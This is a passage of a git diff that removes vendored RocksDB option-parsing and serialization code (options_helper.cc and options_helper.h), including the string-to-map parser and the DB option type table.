-        return Status::InvalidArgument("Unrecognized option: " + o.first);
-      }
-      const auto& opt_info = iter->second;
-      if (!opt_info.is_mutable) {
-        return Status::InvalidArgument("Option not changeable: " + o.first);
-      }
-      bool is_ok = ParseOptionHelper(
-          reinterpret_cast<char*>(new_options) + opt_info.mutable_offset,
-          opt_info.type, o.second);
-      if (!is_ok) {
-        return Status::InvalidArgument("Error parsing " + o.first);
-      }
-    } catch (std::exception& e) {
-      return Status::InvalidArgument("Error parsing " + o.first + ":" +
-                                     std::string(e.what()));
-    }
-  }
-  return Status::OK();
-}
-
-Status StringToMap(const std::string& opts_str,
-                   std::unordered_map<std::string, std::string>* opts_map) {
-  assert(opts_map);
-  // Example:
-  //   opts_str = "write_buffer_size=1024;max_write_buffer_number=2;"
-  //              "nested_opt={opt1=1;opt2=2};max_bytes_for_level_base=100"
-  size_t pos = 0;
-  std::string opts = trim(opts_str);
-  while (pos < opts.size()) {
-    size_t eq_pos = opts.find('=', pos);
-    if (eq_pos == std::string::npos) {
-      return Status::InvalidArgument("Mismatched key value pair, '=' expected");
-    }
-    std::string key = trim(opts.substr(pos, eq_pos - pos));
-    if (key.empty()) {
-      return Status::InvalidArgument("Empty key found");
-    }
-
-    // skip space after '=' and look for '{' for possible nested options
-    pos = eq_pos + 1;
-    while (pos < opts.size() && isspace(opts[pos])) {
-      ++pos;
-    }
-    // Empty value at the end
-    if (pos >= opts.size()) {
-      (*opts_map)[key] = "";
-      break;
-    }
-    if (opts[pos] == '{') {
-      int count = 1;
-      size_t brace_pos = pos + 1;
-      while (brace_pos < opts.size()) {
-        if (opts[brace_pos] == '{') {
-          ++count;
-        } else if (opts[brace_pos] == '}') {
-          --count;
-          if (count == 0) {
-            break;
-          }
-        }
-        ++brace_pos;
-      }
-      // found the matching closing brace
-      if (count == 0) {
-        (*opts_map)[key] = trim(opts.substr(pos + 1, brace_pos - pos - 1));
-        // skip all whitespace and move to the next ';'
-        // brace_pos points to the next position after the matching '}'
-        pos = brace_pos + 1;
-        while (pos < opts.size() && isspace(opts[pos])) {
-          ++pos;
-        }
-        if (pos < opts.size() && opts[pos] != ';') {
-          return Status::InvalidArgument(
-              "Unexpected chars after nested options");
-        }
-        ++pos;
-      } else {
-        return Status::InvalidArgument(
-            "Mismatched curly braces for nested options");
-      }
-    } else {
-      size_t sc_pos = opts.find(';', pos);
-      if (sc_pos == std::string::npos) {
-        (*opts_map)[key] = trim(opts.substr(pos));
-        // It either ends with a trailing semi-colon or the last key-value pair
-        break;
-      } else {
-        (*opts_map)[key] = trim(opts.substr(pos, sc_pos - pos));
-      }
-      pos = sc_pos + 1;
-    }
-  }
-
-  return Status::OK();
-}
-
-Status ParseColumnFamilyOption(const std::string& name,
-                               const std::string& org_value,
-                               ColumnFamilyOptions* new_options,
-                               bool input_strings_escaped = false) {
-  const std::string& value =
-      input_strings_escaped ? UnescapeOptionString(org_value) : org_value;
-  try {
-    if (name == "block_based_table_factory") {
-      // Nested options
-      BlockBasedTableOptions table_opt, base_table_options;
-      BlockBasedTableFactory* block_based_table_factory =
-          static_cast_with_check<BlockBasedTableFactory, TableFactory>(
-              new_options->table_factory.get());
-      if (block_based_table_factory != nullptr) {
-        base_table_options = block_based_table_factory->table_options();
-      }
-      Status table_opt_s = GetBlockBasedTableOptionsFromString(
-          base_table_options, value, &table_opt);
-      if (!table_opt_s.ok()) {
-        return Status::InvalidArgument(
-            "unable to parse the specified CF option " + name);
-      }
-      new_options->table_factory.reset(NewBlockBasedTableFactory(table_opt));
-    } else if (name == "plain_table_factory") {
-      // Nested options
-      PlainTableOptions table_opt, base_table_options;
-      PlainTableFactory* plain_table_factory =
-          static_cast_with_check<PlainTableFactory, TableFactory>(
-              new_options->table_factory.get());
-      if (plain_table_factory != nullptr) {
-        base_table_options = plain_table_factory->table_options();
-      }
-      Status table_opt_s = GetPlainTableOptionsFromString(
-          base_table_options, value, &table_opt);
-      if (!table_opt_s.ok()) {
-        return Status::InvalidArgument(
-            "unable to parse the specified CF option " + name);
-      }
-      new_options->table_factory.reset(NewPlainTableFactory(table_opt));
-    } else if (name == "memtable") {
-      std::unique_ptr<MemTableRepFactory> new_mem_factory;
-      Status mem_factory_s =
-          GetMemTableRepFactoryFromString(value, &new_mem_factory);
-      if (!mem_factory_s.ok()) {
-        return Status::InvalidArgument(
-            "unable to parse the specified CF option " + name);
-      }
-      new_options->memtable_factory.reset(new_mem_factory.release());
-    } else if (name == "compression_opts") {
-      size_t start = 0;
-      size_t end = value.find(':');
-      if (end == std::string::npos) {
-        return Status::InvalidArgument(
-            "unable to parse the specified CF option " + name);
-      }
-      new_options->compression_opts.window_bits =
-          ParseInt(value.substr(start, end - start));
-      start = end + 1;
-      end = value.find(':', start);
-      if (end == std::string::npos) {
-        return Status::InvalidArgument(
-            "unable to parse the specified CF option " + name);
-      }
-      new_options->compression_opts.level =
-          ParseInt(value.substr(start, end - start));
-      start = end + 1;
-      if (start >= value.size()) {
-        return Status::InvalidArgument(
-            "unable to parse the specified CF option " + name);
-      }
-      end = value.find(':', start);
-      new_options->compression_opts.strategy =
-          ParseInt(value.substr(start, value.size() - start));
-      // max_dict_bytes is optional for backwards compatibility
-      if (end != std::string::npos) {
-        start = end + 1;
-        if (start >= value.size()) {
-          return Status::InvalidArgument(
-              "unable to parse the specified CF option " + name);
-        }
-        new_options->compression_opts.max_dict_bytes =
-            ParseInt(value.substr(start, value.size() - start));
-      }
-    } else if (name == "compaction_options_fifo") {
-      new_options->compaction_options_fifo.max_table_files_size =
-          ParseUint64(value);
-    } else {
-      auto iter = cf_options_type_info.find(name);
-      if (iter == cf_options_type_info.end()) {
-        return Status::InvalidArgument(
-            "Unable to parse the specified CF option " + name);
-      }
-      const auto& opt_info = iter->second;
-      if (opt_info.verification != OptionVerificationType::kDeprecated &&
-          ParseOptionHelper(
-              reinterpret_cast<char*>(new_options) + opt_info.offset,
-              opt_info.type, value)) {
-        return Status::OK();
-      }
-      switch (opt_info.verification) {
-        case OptionVerificationType::kByName:
-        case OptionVerificationType::kByNameAllowNull:
-          return Status::NotSupported(
-              "Deserializing the specified CF option " + name +
-                  " is not supported");
-        case OptionVerificationType::kDeprecated:
-          return Status::OK();
-        default:
-          return Status::InvalidArgument(
-              "Unable to parse the specified CF option " + name);
-      }
-    }
-  } catch (const std::exception&) {
-    return Status::InvalidArgument(
-        "unable to parse the specified option " + name);
-  }
-  return Status::OK();
-}
-
-bool SerializeSingleDBOption(std::string* opt_string,
-                             const DBOptions& db_options,
-                             const std::string& name,
-                             const std::string& delimiter) {
-  auto iter = db_options_type_info.find(name);
-  if (iter == db_options_type_info.end()) {
-    return false;
-  }
-  auto& opt_info = iter->second;
-  const char* opt_address =
-      reinterpret_cast<const char*>(&db_options) + opt_info.offset;
-  std::string value;
-  bool result = SerializeSingleOptionHelper(opt_address, opt_info.type, &value);
-  if (result) {
-    *opt_string = name + "=" + value + delimiter;
-  }
-  return result;
-}
-
-Status GetStringFromDBOptions(std::string* opt_string,
-                              const DBOptions& db_options,
-                              const std::string& delimiter) {
-  assert(opt_string);
-  opt_string->clear();
-  for (auto iter = db_options_type_info.begin();
-       iter != db_options_type_info.end(); ++iter) {
-    if (iter->second.verification == OptionVerificationType::kDeprecated) {
-      // If the option is no longer used in rocksdb and marked as deprecated,
-      // we skip it in the serialization.
-      continue;
-    }
-    std::string single_output;
-    bool result = SerializeSingleDBOption(&single_output, db_options,
-                                          iter->first, delimiter);
-    assert(result);
-    if (result) {
-      opt_string->append(single_output);
-    }
-  }
-  return Status::OK();
-}
-
-bool SerializeSingleColumnFamilyOption(std::string* opt_string,
-                                       const ColumnFamilyOptions& cf_options,
-                                       const std::string& name,
-                                       const std::string& delimiter) {
-  auto iter = cf_options_type_info.find(name);
-  if (iter == cf_options_type_info.end()) {
-    return false;
-  }
-  auto& opt_info = iter->second;
-  const char* opt_address =
-      reinterpret_cast<const char*>(&cf_options) + opt_info.offset;
-  std::string value;
-  bool result = SerializeSingleOptionHelper(opt_address, opt_info.type, &value);
-  if (result) {
-    *opt_string = name + "=" + value + delimiter;
-  }
-  return result;
-}
-
-Status GetStringFromColumnFamilyOptions(std::string* opt_string,
-                                        const ColumnFamilyOptions& cf_options,
-                                        const std::string& delimiter) {
-  assert(opt_string);
-  opt_string->clear();
-  for (auto iter = cf_options_type_info.begin();
-       iter != cf_options_type_info.end(); ++iter) {
-    if (iter->second.verification == OptionVerificationType::kDeprecated) {
-      // If the option is no longer used in rocksdb and marked as deprecated,
-      // we skip it in the serialization.
-      continue;
-    }
-    std::string single_output;
-    bool result = SerializeSingleColumnFamilyOption(&single_output, cf_options,
-                                                    iter->first, delimiter);
-    if (result) {
-      opt_string->append(single_output);
-    } else {
-      return Status::InvalidArgument("failed to serialize %s\n",
-                                     iter->first.c_str());
-    }
-    assert(result);
-  }
-  return Status::OK();
-}
-
-Status GetStringFromCompressionType(std::string* compression_str,
-                                    CompressionType compression_type) {
-  bool ok = SerializeEnum<CompressionType>(compression_type_string_map,
-                                           compression_type, compression_str);
-  if (ok) {
-    return Status::OK();
-  } else {
-    return Status::InvalidArgument("Invalid compression types");
-  }
-}
-
-std::vector<CompressionType> GetSupportedCompressions() {
-  std::vector<CompressionType> supported_compressions;
-  for (const auto& comp_to_name : compression_type_string_map) {
-    CompressionType t = comp_to_name.second;
-    if (t != kDisableCompressionOption && CompressionTypeSupported(t)) {
-      supported_compressions.push_back(t);
-    }
-  }
-  return supported_compressions;
-}
-
-Status ParseDBOption(const std::string& name,
-                     const std::string& org_value,
-                     DBOptions* new_options,
-                     bool input_strings_escaped = false) {
-  const std::string& value =
-      input_strings_escaped ? UnescapeOptionString(org_value) : org_value;
-  try {
-    if (name == "rate_limiter_bytes_per_sec") {
-      new_options->rate_limiter.reset(
-          NewGenericRateLimiter(static_cast<int64_t>(ParseUint64(value))));
-    } else {
-      auto iter = db_options_type_info.find(name);
-      if (iter == db_options_type_info.end()) {
-        return Status::InvalidArgument("Unrecognized option DBOptions:", name);
-      }
-      const auto& opt_info = iter->second;
-      if (opt_info.verification != OptionVerificationType::kDeprecated &&
-          ParseOptionHelper(
-              reinterpret_cast<char*>(new_options) + opt_info.offset,
-              opt_info.type, value)) {
-        return Status::OK();
-      }
-      switch (opt_info.verification) {
-        case OptionVerificationType::kByName:
-        case OptionVerificationType::kByNameAllowNull:
-          return Status::NotSupported(
-              "Deserializing the specified DB option " + name +
-                  " is not supported");
-        case OptionVerificationType::kDeprecated:
-          return Status::OK();
-        default:
-          return Status::InvalidArgument(
-              "Unable to parse the specified DB option " + name);
-      }
-    }
-  } catch (const std::exception&) {
-    return Status::InvalidArgument("Unable to parse DBOptions:", name);
-  }
-  return Status::OK();
-}
-
-Status GetColumnFamilyOptionsFromMap(
-    const ColumnFamilyOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    ColumnFamilyOptions* new_options, bool input_strings_escaped,
-    bool ignore_unknown_options) {
-  return GetColumnFamilyOptionsFromMapInternal(
-      base_options, opts_map, new_options, input_strings_escaped, nullptr,
-      ignore_unknown_options);
-}
-
-Status GetColumnFamilyOptionsFromMapInternal(
-    const ColumnFamilyOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    ColumnFamilyOptions* new_options, bool input_strings_escaped,
-    std::vector<std::string>* unsupported_options_names,
-    bool ignore_unknown_options) {
-  assert(new_options);
-  *new_options = base_options;
-  if (unsupported_options_names) {
-    unsupported_options_names->clear();
-  }
-  for (const auto& o : opts_map) {
-    auto s = ParseColumnFamilyOption(o.first, o.second, new_options,
-                                 input_strings_escaped);
-    if (!s.ok()) {
-      if (s.IsNotSupported()) {
-        // If the deserialization of the specified option is not supported
-        // and an output vector of unsupported_options is provided, then
-        // we log the name of the unsupported option and proceed.
-        if (unsupported_options_names != nullptr) {
-          unsupported_options_names->push_back(o.first);
-        }
-        // Note that we still return Status::OK in such case to maintain
-        // the backward compatibility in the old public API defined in
-        // rocksdb/convenience.h
-      } else if (s.IsInvalidArgument() && ignore_unknown_options) {
-        continue;
-      } else {
-        // Restore "new_options" to the default "base_options".
-        *new_options = base_options;
-        return s;
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status GetColumnFamilyOptionsFromString(
-    const ColumnFamilyOptions& base_options,
-    const std::string& opts_str,
-    ColumnFamilyOptions* new_options) {
-  std::unordered_map<std::string, std::string> opts_map;
-  Status s = StringToMap(opts_str, &opts_map);
-  if (!s.ok()) {
-    *new_options = base_options;
-    return s;
-  }
-  return GetColumnFamilyOptionsFromMap(base_options, opts_map, new_options);
-}
-
-Status GetDBOptionsFromMap(
-    const DBOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    DBOptions* new_options, bool input_strings_escaped,
-    bool ignore_unknown_options) {
-  return GetDBOptionsFromMapInternal(base_options, opts_map, new_options,
-                                     input_strings_escaped, nullptr,
-                                     ignore_unknown_options);
-}
-
-Status GetDBOptionsFromMapInternal(
-    const DBOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    DBOptions* new_options, bool input_strings_escaped,
-    std::vector<std::string>* unsupported_options_names,
-    bool ignore_unknown_options) {
-  assert(new_options);
-  *new_options = base_options;
-  if (unsupported_options_names) {
-    unsupported_options_names->clear();
-  }
-  for (const auto& o : opts_map) {
-    auto s = ParseDBOption(o.first, o.second,
-                           new_options, input_strings_escaped);
-    if (!s.ok()) {
-      if (s.IsNotSupported()) {
-        // If the deserialization of the specified option is not supported
-        // and an output vector of unsupported_options is provided, then
-        // we log the name of the unsupported option and proceed.
-        if (unsupported_options_names != nullptr) {
-          unsupported_options_names->push_back(o.first);
-        }
-        // Note that we still return Status::OK in such case to maintain
-        // the backward compatibility in the old public API defined in
-        // rocksdb/convenience.h
-      } else if (s.IsInvalidArgument() && ignore_unknown_options) {
-        continue;
-      } else {
-        // Restore "new_options" to the default "base_options".
-        *new_options = base_options;
-        return s;
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status GetDBOptionsFromString(
-    const DBOptions& base_options,
-    const std::string& opts_str,
-    DBOptions* new_options) {
-  std::unordered_map<std::string, std::string> opts_map;
-  Status s = StringToMap(opts_str, &opts_map);
-  if (!s.ok()) {
-    *new_options = base_options;
-    return s;
-  }
-  return GetDBOptionsFromMap(base_options, opts_map, new_options);
-}
-
-Status GetOptionsFromString(const Options& base_options,
-                            const std::string& opts_str, Options* new_options) {
-  std::unordered_map<std::string, std::string> opts_map;
-  Status s = StringToMap(opts_str, &opts_map);
-  if (!s.ok()) {
-    return s;
-  }
-  DBOptions new_db_options(base_options);
-  ColumnFamilyOptions new_cf_options(base_options);
-  for (const auto& o : opts_map) {
-    if (ParseDBOption(o.first, o.second, &new_db_options).ok()) {
-    } else if (ParseColumnFamilyOption(
-        o.first, o.second, &new_cf_options).ok()) {
-    } else {
-      return Status::InvalidArgument("Can't parse option " + o.first);
-    }
-  }
-  *new_options = Options(new_db_options, new_cf_options);
-  return Status::OK();
-}
-
-Status GetTableFactoryFromMap(
-    const std::string& factory_name,
-    const std::unordered_map<std::string, std::string>& opt_map,
-    std::shared_ptr<TableFactory>* table_factory, bool ignore_unknown_options) {
-  Status s;
-  if (factory_name == BlockBasedTableFactory().Name()) {
-    BlockBasedTableOptions bbt_opt;
-    s = GetBlockBasedTableOptionsFromMap(BlockBasedTableOptions(), opt_map,
-                                         &bbt_opt,
-                                         true, /* input_strings_escaped */
-                                         ignore_unknown_options);
-    if (!s.ok()) {
-      return s;
-    }
-    table_factory->reset(new BlockBasedTableFactory(bbt_opt));
-    return Status::OK();
-  } else if (factory_name == PlainTableFactory().Name()) {
-    PlainTableOptions pt_opt;
-    s = GetPlainTableOptionsFromMap(PlainTableOptions(), opt_map, &pt_opt,
-                                    true, /* input_strings_escaped */
-                                    ignore_unknown_options);
-    if (!s.ok()) {
-      return s;
-    }
-    table_factory->reset(new PlainTableFactory(pt_opt));
-    return Status::OK();
-  }
-  // Return OK for not supported table factories as TableFactory
-  // Deserialization is optional.
-  table_factory->reset();
-  return Status::OK();
-}
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/options_helper.h b/thirdparty/rocksdb/options/options_helper.h
deleted file mode 100644
index 67b0427..0000000
--- a/thirdparty/rocksdb/options/options_helper.h
+++ /dev/null
@@ -1,650 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <map>
-#include <stdexcept>
-#include <string>
-#include <vector>
-
-#include "options/cf_options.h"
-#include "options/db_options.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-DBOptions BuildDBOptions(const ImmutableDBOptions& immutable_db_options,
-                         const MutableDBOptions& mutable_db_options);
-
-ColumnFamilyOptions BuildColumnFamilyOptions(
-    const ColumnFamilyOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options);
-
-static std::map<CompactionStyle, std::string> compaction_style_to_string = {
-    {kCompactionStyleLevel, "kCompactionStyleLevel"},
-    {kCompactionStyleUniversal, "kCompactionStyleUniversal"},
-    {kCompactionStyleFIFO, "kCompactionStyleFIFO"},
-    {kCompactionStyleNone, "kCompactionStyleNone"}};
-
-static std::map<CompactionPri, std::string> compaction_pri_to_string = {
-    {kByCompensatedSize, "kByCompensatedSize"},
-    {kOldestLargestSeqFirst, "kOldestLargestSeqFirst"},
-    {kOldestSmallestSeqFirst, "kOldestSmallestSeqFirst"},
-    {kMinOverlappingRatio, "kMinOverlappingRatio"}};
-
-static std::map<CompactionStopStyle, std::string>
-    compaction_stop_style_to_string = {
-        {kCompactionStopStyleSimilarSize, "kCompactionStopStyleSimilarSize"},
-        {kCompactionStopStyleTotalSize, "kCompactionStopStyleTotalSize"}};
-
-static std::unordered_map<std::string, ChecksumType> checksum_type_string_map =
-    {{"kNoChecksum", kNoChecksum}, {"kCRC32c", kCRC32c}, {"kxxHash", kxxHash}};
-
-#ifndef ROCKSDB_LITE
-
-Status GetMutableOptionsFromStrings(
-    const MutableCFOptions& base_options,
-    const std::unordered_map<std::string, std::string>& options_map,
-    MutableCFOptions* new_options);
-
-Status GetMutableDBOptionsFromStrings(
-    const MutableDBOptions& base_options,
-    const std::unordered_map<std::string, std::string>& options_map,
-    MutableDBOptions* new_options);
-
-Status GetTableFactoryFromMap(
-    const std::string& factory_name,
-    const std::unordered_map<std::string, std::string>& opt_map,
-    std::shared_ptr<TableFactory>* table_factory,
-    bool ignore_unknown_options = false);
-
-enum class OptionType {
-  kBoolean,
-  kInt,
-  kVectorInt,
-  kUInt,
-  kUInt32T,
-  kUInt64T,
-  kSizeT,
-  kString,
-  kDouble,
-  kCompactionStyle,
-  kCompactionPri,
-  kSliceTransform,
-  kCompressionType,
-  kVectorCompressionType,
-  kTableFactory,
-  kComparator,
-  kCompactionFilter,
-  kCompactionFilterFactory,
-  kMergeOperator,
-  kMemTableRepFactory,
-  kBlockBasedTableIndexType,
-  kFilterPolicy,
-  kFlushBlockPolicyFactory,
-  kChecksumType,
-  kEncodingType,
-  kWALRecoveryMode,
-  kAccessHint,
-  kInfoLogLevel,
-  kUnknown
-};
-
-enum class OptionVerificationType {
-  kNormal,
-  kByName,           // The option is pointer typed so we can only verify
-                     // based on it's name.
-  kByNameAllowNull,  // Same as kByName, but it also allows the case
-                     // where one of them is a nullptr.
-  kDeprecated        // The option is no longer used in rocksdb. The RocksDB
-                     // OptionsParser will still accept this option if it
-                     // happen to exists in some Options file.  However, the
-                     // parser will not include it in serialization and
-                     // verification processes.
-};
-
-// A struct for storing constant option information such as option name,
-// option type, and offset.
-struct OptionTypeInfo {
-  int offset;
-  OptionType type;
-  OptionVerificationType verification;
-  bool is_mutable;
-  int mutable_offset;
-};
-
-// A helper function that converts "opt_address" to a std::string
-// based on the specified OptionType.
-bool SerializeSingleOptionHelper(const char* opt_address,
-                                 const OptionType opt_type, std::string* value);
-
-// In addition to its public version defined in rocksdb/convenience.h,
-// this further takes an optional output vector "unsupported_options_names",
-// which stores the name of all the unsupported options specified in "opts_map".
-Status GetDBOptionsFromMapInternal(
-    const DBOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    DBOptions* new_options, bool input_strings_escaped,
-    std::vector<std::string>* unsupported_options_names = nullptr,
-    bool ignore_unknown_options = false);
-
-// In addition to its public version defined in rocksdb/convenience.h,
-// this further takes an optional output vector "unsupported_options_names",
-// which stores the name of all the unsupported options specified in "opts_map".
-Status GetColumnFamilyOptionsFromMapInternal(
-    const ColumnFamilyOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    ColumnFamilyOptions* new_options, bool input_strings_escaped,
-    std::vector<std::string>* unsupported_options_names = nullptr,
-    bool ignore_unknown_options = false);
-
-static std::unordered_map<std::string, OptionTypeInfo> db_options_type_info = {
-    /*
-     // not yet supported
-      Env* env;
-      std::shared_ptr<Cache> row_cache;
-      std::shared_ptr<DeleteScheduler> delete_scheduler;
-      std::shared_ptr<Logger> info_log;
-      std::shared_ptr<RateLimiter> rate_limiter;
-      std::shared_ptr<Statistics> statistics;
-      std::vector<DbPath> db_paths;
-      std::vector<std::shared_ptr<EventListener>> listeners;
-     */
-    {"advise_random_on_open",
-     {offsetof(struct DBOptions, advise_random_on_open), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"allow_mmap_reads",
-     {offsetof(struct DBOptions, allow_mmap_reads), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"allow_fallocate",
-     {offsetof(struct DBOptions, allow_fallocate), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"allow_mmap_writes",
-     {offsetof(struct DBOptions, allow_mmap_writes), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"use_direct_reads",
-     {offsetof(struct DBOptions, use_direct_reads), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"use_direct_writes",
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false, 0}},
-    {"use_direct_io_for_flush_and_compaction",
-     {offsetof(struct DBOptions, use_direct_io_for_flush_and_compaction),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"allow_2pc",
-     {offsetof(struct DBOptions, allow_2pc), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"allow_os_buffer",
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, true, 0}},
-    {"create_if_missing",
-     {offsetof(struct DBOptions, create_if_missing), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"create_missing_column_families",
-     {offsetof(struct DBOptions, create_missing_column_families),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"disableDataSync",
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false, 0}},
-    {"disable_data_sync",  // for compatibility
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false, 0}},
-    {"enable_thread_tracking",
-     {offsetof(struct DBOptions, enable_thread_tracking), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"error_if_exists",
-     {offsetof(struct DBOptions, error_if_exists), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"is_fd_close_on_exec",
-     {offsetof(struct DBOptions, is_fd_close_on_exec), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"paranoid_checks",
-     {offsetof(struct DBOptions, paranoid_checks), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"skip_log_error_on_recovery",
-     {offsetof(struct DBOptions, skip_log_error_on_recovery),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"skip_stats_update_on_db_open",
-     {offsetof(struct DBOptions, skip_stats_update_on_db_open),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"new_table_reader_for_compaction_inputs",
-     {offsetof(struct DBOptions, new_table_reader_for_compaction_inputs),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"compaction_readahead_size",
-     {offsetof(struct DBOptions, compaction_readahead_size), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"random_access_max_buffer_size",
-     {offsetof(struct DBOptions, random_access_max_buffer_size),
-      OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}},
-    {"writable_file_max_buffer_size",
-     {offsetof(struct DBOptions, writable_file_max_buffer_size),
-      OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}},
-    {"use_adaptive_mutex",
-     {offsetof(struct DBOptions, use_adaptive_mutex), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"use_fsync",
-     {offsetof(struct DBOptions, use_fsync), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"max_background_jobs",
-     {offsetof(struct DBOptions, max_background_jobs), OptionType::kInt,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, max_background_jobs)}},
-    {"max_background_compactions",
-     {offsetof(struct DBOptions, max_background_compactions), OptionType::kInt,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, max_background_compactions)}},
-    {"base_background_compactions",
-     {offsetof(struct DBOptions, base_background_compactions), OptionType::kInt,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, base_background_compactions)}},
-    {"max_background_flushes",
-     {offsetof(struct DBOptions, max_background_flushes), OptionType::kInt,
-      OptionVerificationType::kNormal, false, 0}},
-    {"max_file_opening_threads",
-     {offsetof(struct DBOptions, max_file_opening_threads), OptionType::kInt,
-      OptionVerificationType::kNormal, false, 0}},
-    {"max_open_files",
-     {offsetof(struct DBOptions, max_open_files), OptionType::kInt,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, max_open_files)}},
-    {"table_cache_numshardbits",
-     {offsetof(struct DBOptions, table_cache_numshardbits), OptionType::kInt,
-      OptionVerificationType::kNormal, false, 0}},
-    {"db_write_buffer_size",
-     {offsetof(struct DBOptions, db_write_buffer_size), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"keep_log_file_num",
-     {offsetof(struct DBOptions, keep_log_file_num), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"recycle_log_file_num",
-     {offsetof(struct DBOptions, recycle_log_file_num), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"log_file_time_to_roll",
-     {offsetof(struct DBOptions, log_file_time_to_roll), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"manifest_preallocation_size",
-     {offsetof(struct DBOptions, manifest_preallocation_size),
-      OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}},
-    {"max_log_file_size",
-     {offsetof(struct DBOptions, max_log_file_size), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"db_log_dir",
-     {offsetof(struct DBOptions, db_log_dir), OptionType::kString,
-      OptionVerificationType::kNormal, false, 0}},
-    {"wal_dir",
-     {offsetof(struct DBOptions, wal_dir), OptionType::kString,
-      OptionVerificationType::kNormal, false, 0}},
-    {"max_subcompactions",
-     {offsetof(struct DBOptions, max_subcompactions), OptionType::kUInt32T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"WAL_size_limit_MB",
-     {offsetof(struct DBOptions, WAL_size_limit_MB), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"WAL_ttl_seconds",
-     {offsetof(struct DBOptions, WAL_ttl_seconds), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"bytes_per_sync",
-     {offsetof(struct DBOptions, bytes_per_sync), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"delayed_write_rate",
-     {offsetof(struct DBOptions, delayed_write_rate), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, delayed_write_rate)}},
-    {"delete_obsolete_files_period_micros",
-     {offsetof(struct DBOptions, delete_obsolete_files_period_micros),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, delete_obsolete_files_period_micros)}},
-    {"max_manifest_file_size",
-     {offsetof(struct DBOptions, max_manifest_file_size), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"max_total_wal_size",
-     {offsetof(struct DBOptions, max_total_wal_size), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, max_total_wal_size)}},
-    {"wal_bytes_per_sync",
-     {offsetof(struct DBOptions, wal_bytes_per_sync), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"stats_dump_period_sec",
-     {offsetof(struct DBOptions, stats_dump_period_sec), OptionType::kUInt,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, stats_dump_period_sec)}},
-    {"fail_if_options_file_error",
-     {offsetof(struct DBOptions, fail_if_options_file_error),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"enable_pipelined_write",
-     {offsetof(struct DBOptions, enable_pipelined_write), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"allow_concurrent_memtable_write",
-     {offsetof(struct DBOptions, allow_concurrent_memtable_write),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"wal_recovery_mode",
-     {offsetof(struct DBOptions, wal_recovery_mode),
